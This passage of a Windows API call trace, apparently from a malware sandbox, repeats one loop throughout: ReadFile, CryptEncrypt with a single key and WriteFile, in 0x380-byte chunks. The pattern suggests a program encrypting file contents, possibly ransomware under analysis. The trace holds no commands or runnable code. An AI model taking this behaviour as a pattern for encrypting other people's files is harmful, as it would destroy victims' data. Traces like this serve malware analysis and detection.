(in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.763] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.763] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.763] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.763] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.763] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.763] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.763] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.763] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.763] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.763] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.764] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.764] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.764] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.764] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.764] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.764] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.764] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.764] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.764] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.764] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.764] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.764] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.765] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.765] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.765] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.765] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.765] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.765] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.765] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.765] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.765] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.765] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.765] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.765] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.765] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.765] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.766] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.766] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.766] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.766] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.766] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.766] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.766] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.766] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.766] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.766] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.766] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.766] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.766] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.767] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.767] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.767] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.767] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.767] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.767] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.767] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.767] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.770] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.770] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.770] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.770] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.770] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.770] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.770] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.770] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.771] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.771] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.771] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.771] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.771] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.771] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.771] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.771] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.771] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.771] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.771] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.771] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.772] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.772] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.772] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.772] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.772] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.772] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.772] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.772] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.772] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.772] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.772] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.772] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.772] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.772] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.773] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.773] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.773] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.773] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.773] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.773] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.773] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.773] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.773] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.773] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.774] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, 